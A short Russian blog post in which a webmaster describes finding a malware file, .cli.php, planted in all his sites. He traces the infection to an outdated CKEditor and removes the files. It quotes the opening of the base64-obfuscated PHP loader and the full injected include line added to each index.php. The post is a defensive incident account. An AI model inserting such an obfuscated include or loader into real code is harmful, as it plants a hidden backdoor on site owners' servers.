Приехав  с морей я обнаружил в корне всех своих сайтов файл .cli.php. Содержимое файла было закодировано base64

<?php error_reporting(0);
$MTQMzEwNTAxMmE='base64_decode';
$MTQMzEwNTAxMmI=$MTQMzEwNTAxMmE(str_replace("\n", '', и далее куча кода.

В начало каждого файла index.php был добавлен вызывающий код.

<?php error_reporting(0); @include_once( dirname(__FILE__) ."/". urldecode("%2E%63%6C%69%2E%70%68%70"));?>

Заражал все сайты видимо скрипт, видно что работа не ручная. За 15 минут вся лишняя дрянь была удалена, но возник другой вопрос — откуда она появилась? Большая часть сайтов это WP и только пара сайтов клиентских на самопальных движках и DLE. Поскольку DLE и WP я постоянно обновляю подозрения остались на самописный сайт.

И его редактор Сkeditor. Оказалось, что там стояла версия 4.0.1 в которой была обнаружена уязвимость. Скачал свежий Сkeditor, удалил старый и вроде как отпустило. Надеюсь что добрый хакер не оставил нигде запасной шелл.